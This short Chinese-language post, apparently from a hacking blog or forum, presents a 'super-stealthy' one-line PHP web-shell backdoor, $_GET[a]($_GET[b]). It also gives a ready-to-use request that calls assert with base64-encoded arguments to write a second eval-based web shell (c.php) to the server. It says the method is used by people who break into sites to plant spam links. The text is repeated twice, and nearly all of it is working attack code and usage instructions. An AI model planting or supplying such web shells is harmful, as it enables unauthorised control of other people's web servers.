超级隐蔽PHP一句话木马
很多挂黑链的2B常常用这个方式来入侵网。
代码:
$_GET[a]($_GET[b]);
仅用GET函数就构成了木马;
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29
执行后当前目录生成c.php一句话木马
(PS:当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马)
超级隐蔽PHP一句话木马
代码:
$_GET[a]($_GET[b]);
仅用GET函数就构成了木马;
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29
执行后当前目录生成c.php一句话木马